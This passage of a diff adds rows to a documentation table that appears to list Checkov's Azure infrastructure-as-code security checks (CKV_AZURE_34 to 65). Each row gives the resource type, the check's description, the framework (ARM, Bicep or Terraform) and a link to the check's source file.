+| 1677 | CKV_AZURE_34             | resource                         | blobServices/containers                                                                          | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | arm                     | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                         |
+| 1678 | CKV_AZURE_34             | resource                         | blobServices/containers                                                                          | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Bicep                   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                         |
+| 1679 | CKV_AZURE_34             | resource                         | containers                                                                                       | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | arm                     | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                         |
+| 1680 | CKV_AZURE_34             | resource                         | containers                                                                                       | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Bicep                   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                         |
+| 1681 | CKV_AZURE_35             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | arm                     | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py)                                                             |
+| 1682 | CKV_AZURE_35             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Bicep                   | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                                     |
+| 1683 | CKV_AZURE_35             | resource                         | azurerm_storage_account                                                                          | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Terraform               | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                                 |
+| 1684 | CKV_AZURE_35             | resource                         | azurerm_storage_account_network_rules                                                            | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Terraform               | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                                 |
+| 1685 | CKV_AZURE_36             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | arm                     | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py)                                                         |
+| 1686 | CKV_AZURE_36             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Bicep                   | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                                 |
+| 1687 | CKV_AZURE_36             | resource                         | azurerm_storage_account                                                                          | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Terraform               | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                             |
+| 1688 | CKV_AZURE_36             | resource                         | azurerm_storage_account_network_rules                                                            | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Terraform               | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                             |
+| 1689 | CKV_AZURE_37             | resource                         | Microsoft.Insights/logprofiles                                                                   | Ensure that Activity Log Retention is set 365 days or greater                                                                                                                                            | arm                     | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py)                                                                             |
+| 1690 | CKV_AZURE_37             | resource                         | Microsoft.Insights/logprofiles                                                                   | Ensure that Activity Log Retention is set 365 days or greater                                                                                                                                            | Bicep                   | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py)                                                                             |
+| 1691 | CKV_AZURE_37             | resource                         | azurerm_monitor_log_profile                                                                      | Ensure that Activity Log Retention is set 365 days or greater                                                                                                                                            | Terraform               | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py)                                                                 |
+| 1692 | CKV_AZURE_38             | resource                         | Microsoft.Insights/logprofiles                                                                   | Ensure audit profile captures all the activities                                                                                                                                                         | arm                     | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py)                                                                                   |
+| 1693 | CKV_AZURE_38             | resource                         | Microsoft.Insights/logprofiles                                                                   | Ensure audit profile captures all the activities                                                                                                                                                         | Bicep                   | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py)                                                                                   |
+| 1694 | CKV_AZURE_38             | resource                         | azurerm_monitor_log_profile                                                                      | Ensure audit profile captures all the activities                                                                                                                                                         | Terraform               | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py)                                                                       |
+| 1695 | CKV_AZURE_39             | resource                         | Microsoft.Authorization/roleDefinitions                                                          | Ensure that no custom subscription owner roles are created                                                                                                                                               | arm                     | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py)                                                               |
+| 1696 | CKV_AZURE_39             | resource                         | Microsoft.Authorization/roleDefinitions                                                          | Ensure that no custom subscription owner roles are created                                                                                                                                               | Bicep                   | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py)                                                               |
+| 1697 | CKV_AZURE_39             | resource                         | azurerm_role_definition                                                                          | Ensure that no custom subscription owner roles are created                                                                                                                                               | Terraform               | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py)                                                   |
+| 1698 | CKV_AZURE_40             | resource                         | Microsoft.KeyVault/vaults/keys                                                                   | Ensure that the expiration date is set on all keys                                                                                                                                                       | arm                     | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py)                                                                                                       |
+| 1699 | CKV_AZURE_40             | resource                         | Microsoft.KeyVault/vaults/keys                                                                   | Ensure that the expiration date is set on all keys                                                                                                                                                       | Bicep                   | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py)                                                                                                       |
+| 1700 | CKV_AZURE_40             | resource                         | azurerm_key_vault_key                                                                            | Ensure that the expiration date is set on all keys                                                                                                                                                       | Terraform               | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py)                                                                                           |
+| 1701 | CKV_AZURE_41             | resource                         | Microsoft.KeyVault/vaults/secrets                                                                | Ensure that the expiration date is set on all secrets                                                                                                                                                    | arm                     | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py)                                                                                                 |
+| 1702 | CKV_AZURE_41             | resource                         | Microsoft.KeyVault/vaults/secrets                                                                | Ensure that the expiration date is set on all secrets                                                                                                                                                    | Bicep                   | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py)                                                                                                 |
+| 1703 | CKV_AZURE_41             | resource                         | azurerm_key_vault_secret                                                                         | Ensure that the expiration date is set on all secrets                                                                                                                                                    | Terraform               | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py)                                                                                     |
+| 1704 | CKV_AZURE_42             | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure the key vault is recoverable                                                                                                                                                                      | arm                     | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py)                                                                                           |
+| 1705 | CKV_AZURE_42             | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure the key vault is recoverable                                                                                                                                                                      | Bicep                   | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py)                                                                                           |
+| 1706 | CKV_AZURE_42             | resource                         | azurerm_key_vault                                                                                | Ensure the key vault is recoverable                                                                                                                                                                      | Terraform               | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py)                                                                               |
+| 1707 | CKV_AZURE_43             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure Storage Accounts adhere to the naming rules                                                                                                                                                       | arm                     | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountName.py)                                                                                                     |
+| 1708 | CKV_AZURE_43             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure Storage Accounts adhere to the naming rules                                                                                                                                                       | Bicep                   | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountName.py)                                                                                                     |
+| 1709 | CKV_AZURE_43             | resource                         | azurerm_storage_account                                                                          | Ensure Storage Accounts adhere to the naming rules                                                                                                                                                       | Terraform               | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py)                                                                                         |
+| 1710 | CKV_AZURE_44             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure Storage Account is using the latest version of TLS encryption                                                                                                                                     | arm                     | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py)                                                                           |
+| 1711 | CKV_AZURE_44             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure Storage Account is using the latest version of TLS encryption                                                                                                                                     | Bicep                   | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py)                                                                           |
+| 1712 | CKV_AZURE_44             | resource                         | azurerm_storage_account                                                                          | Ensure Storage Account is using the latest version of TLS encryption                                                                                                                                     | Terraform               | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py)                                                               |
+| 1713 | CKV_AZURE_45             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that no sensitive credentials are exposed in VM custom_data                                                                                                                                       | arm                     | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMCredsInCustomData.py)                                                                                                   |
+| 1714 | CKV_AZURE_45             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that no sensitive credentials are exposed in VM custom_data                                                                                                                                       | Bicep                   | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMCredsInCustomData.py)                                                                                                   |
+| 1715 | CKV_AZURE_45             | resource                         | azurerm_virtual_machine                                                                          | Ensure that no sensitive credentials are exposed in VM custom_data                                                                                                                                       | Terraform               | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py)                                                                                       |
+| 1716 | CKV_AZURE_47             | resource                         | Microsoft.DBforMariaDB/servers                                                                   | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                                                                                                                  | arm                     | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py)                                                                                 |
+| 1717 | CKV_AZURE_47             | resource                         | Microsoft.DBforMariaDB/servers                                                                   | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                                                                                                                  | Bicep                   | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py)                                                                                 |
+| 1718 | CKV_AZURE_47             | resource                         | azurerm_mariadb_server                                                                           | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                                                                                                                  | Terraform               | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py)                                                                     |
+| 1719 | CKV_AZURE_48             | resource                         | Microsoft.DBforMariaDB/servers                                                                   | Ensure 'public network access enabled' is set to 'False' for MariaDB servers                                                                                                                             | arm                     | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py)                                                                                   |
+| 1720 | CKV_AZURE_48             | resource                         | Microsoft.DBforMariaDB/servers                                                                   | Ensure 'public network access enabled' is set to 'False' for MariaDB servers                                                                                                                             | Bicep                   | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py)                                                                                   |
+| 1721 | CKV_AZURE_48             | resource                         | azurerm_mariadb_server                                                                           | Ensure 'public network access enabled' is set to 'False' for MariaDB servers                                                                                                                             | Terraform               | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py)                                                                       |
+| 1722 | CKV_AZURE_49             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                                                                                                                      | arm                     | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py)                                                                                               |
+| 1723 | CKV_AZURE_49             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                                                                                                                      | Bicep                   | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py)                                                                                               |
+| 1724 | CKV_AZURE_49             | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                                                                                                                      | Terraform               | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py)                                                                                   |
+| 1725 | CKV_AZURE_50             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | arm                     | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py)                                                                                           |
+| 1726 | CKV_AZURE_50             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Bicep                   | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py)                                                                                           |
+| 1727 | CKV_AZURE_50             | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Terraform               | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py)                                                                               |
+| 1728 | CKV_AZURE_50             | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Terraform               | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py)                                                                               |
+| 1729 | CKV_AZURE_52             | resource                         | Microsoft.Sql/servers                                                                            | Ensure MSSQL is using the latest version of TLS encryption                                                                                                                                               | arm                     | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py)                                                                                         |
+| 1730 | CKV_AZURE_52             | resource                         | Microsoft.Sql/servers                                                                            | Ensure MSSQL is using the latest version of TLS encryption                                                                                                                                               | Bicep                   | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py)                                                                                         |
+| 1731 | CKV_AZURE_52             | resource                         | azurerm_mssql_server                                                                             | Ensure MSSQL is using the latest version of TLS encryption                                                                                                                                               | Terraform               | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py)                                                                             |
+| 1732 | CKV_AZURE_53             | resource                         | Microsoft.DBforMySQL/servers                                                                     | Ensure 'public network access enabled' is set to 'False' for mySQL servers                                                                                                                               | arm                     | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py)                                                                                       |
+| 1733 | CKV_AZURE_53             | resource                         | Microsoft.DBforMySQL/servers                                                                     | Ensure 'public network access enabled' is set to 'False' for mySQL servers                                                                                                                               | Bicep                   | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py)                                                                                       |
+| 1734 | CKV_AZURE_53             | resource                         | azurerm_mysql_server                                                                             | Ensure 'public network access enabled' is set to 'False' for mySQL servers                                                                                                                               | Terraform               | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py)                                                                           |
+| 1735 | CKV_AZURE_54             | resource                         | Microsoft.DBforMySQL/servers                                                                     | Ensure MySQL is using the latest version of TLS encryption                                                                                                                                               | arm                     | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py)                                                                                         |
+| 1736 | CKV_AZURE_54             | resource                         | Microsoft.DBforMySQL/servers                                                                     | Ensure MySQL is using the latest version of TLS encryption                                                                                                                                               | Bicep                   | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py)                                                                                         |
+| 1737 | CKV_AZURE_54             | resource                         | azurerm_mysql_server                                                                             | Ensure MySQL is using the latest version of TLS encryption                                                                                                                                               | Terraform               | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py)                                                                             |
+| 1738 | CKV_AZURE_55             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Servers                                                                                                                                                      | Terraform               | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py)                                                                                 |
+| 1739 | CKV_AZURE_56             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that function apps enables Authentication                                                                                                                                                         | arm                     | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py)                                                                         |
+| 1740 | CKV_AZURE_56             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that function apps enables Authentication                                                                                                                                                         | Bicep                   | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py)                                                                         |
+| 1741 | CKV_AZURE_56             | resource                         | azurerm_function_app                                                                             | Ensure that function apps enables Authentication                                                                                                                                                         | Terraform               | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py)                                                             |
+| 1742 | CKV_AZURE_57             | resource                         | Microsoft.Web/sites                                                                              | Ensure that CORS disallows every resource to access app services                                                                                                                                         | arm                     | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py)                                                                                             |
+| 1743 | CKV_AZURE_57             | resource                         | Microsoft.Web/sites                                                                              | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Bicep                   | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py)                                                                                             |
+| 1744 | CKV_AZURE_57             | resource                         | azurerm_app_service                                                                              | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform               | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                                 |
+| 1745 | CKV_AZURE_57             | resource                         | azurerm_linux_web_app                                                                            | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform               | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                                 |
+| 1746 | CKV_AZURE_57             | resource                         | azurerm_windows_web_app                                                                          | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform               | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                                 |
+| 1747 | CKV_AZURE_58             | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure that Azure Synapse workspaces enables managed virtual networks                                                                                                                                    | arm                     | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                                               |
+| 1748 | CKV_AZURE_58             | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure that Azure Synapse workspaces enables managed virtual networks                                                                                                                                    | Bicep                   | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                                               |
+| 1749 | CKV_AZURE_58             | resource                         | azurerm_synapse_workspace                                                                        | Ensure that Azure Synapse workspaces enables managed virtual networks                                                                                                                                    | Terraform               | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                                   |
+| 1750 | CKV_AZURE_59             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that Storage accounts disallow public access                                                                                                                                                      | arm                     | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py)                                                                       |
+| 1751 | CKV_AZURE_59             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that Storage accounts disallow public access                                                                                                                                                      | Bicep                   | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py)                                                                       |
+| 1752 | CKV_AZURE_59             | resource                         | azurerm_storage_account                                                                          | Ensure that Storage accounts disallow public access                                                                                                                                                      | Terraform               | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py)                                                           |
+| 1753 | CKV_AZURE_61             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for App Service                                                                                                                                                  | Terraform               | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py)                                                                         |
+| 1754 | CKV_AZURE_62             | resource                         | Microsoft.Web/sites                                                                              | Ensure function apps are not accessible from all regions                                                                                                                                                 | arm                     | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py)                                                                                           |
+| 1755 | CKV_AZURE_62             | resource                         | Microsoft.Web/sites                                                                              | Ensure function apps are not accessible from all regions                                                                                                                                                 | Bicep                   | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py)                                                                                           |
+| 1756 | CKV_AZURE_62             | resource                         | azurerm_function_app                                                                             | Ensure function apps are not accessible from all regions                                                                                                                                                 | Terraform               | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py)                                                                               |
+| 1757 | CKV_AZURE_63             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables HTTP logging                                                                                                                                                             | arm                     | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py)                                                                                 |
+| 1758 | CKV_AZURE_63             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables HTTP logging                                                                                                                                                             | Bicep                   | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py)                                                                                 |
+| 1759 | CKV_AZURE_63             | resource                         | azurerm_app_service                                                                              | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform               | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                                     |
+| 1760 | CKV_AZURE_63             | resource                         | azurerm_linux_web_app                                                                            | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform               | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                                     |
+| 1761 | CKV_AZURE_63             | resource                         | azurerm_windows_web_app                                                                          | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform               | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                                     |
+| 1762 | CKV_AZURE_64             | resource                         | Microsoft.StorageSync/storageSyncServices                                                        | Ensure that Azure File Sync disables public network access                                                                                                                                               | arm                     | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py)                                                                           |
+| 1763 | CKV_AZURE_64             | resource                         | Microsoft.StorageSync/storageSyncServices                                                        | Ensure that Azure File Sync disables public network access                                                                                                                                               | Bicep                   | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py)                                                                           |
+| 1764 | CKV_AZURE_64             | resource                         | azurerm_storage_sync                                                                             | Ensure that Azure File Sync disables public network access                                                                                                                                               | Terraform               | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py)                                                               |
+| 1765 | CKV_AZURE_65             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables detailed error messages                                                                                                                                                  | arm                     | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py)                                                             |
+| 1766 | CKV_AZURE_65             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables detailed error messages                                                                                                                                                  | Bicep                   | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py)                                                             |
+| 1767 | CKV_AZURE_65             | resource                         | azurerm_app_service                                                                              | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform               | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                                 |
+| 1768 | CKV_AZURE_65             | resource                         | azurerm_linux_web_app                                                                            | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform               | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                                 |
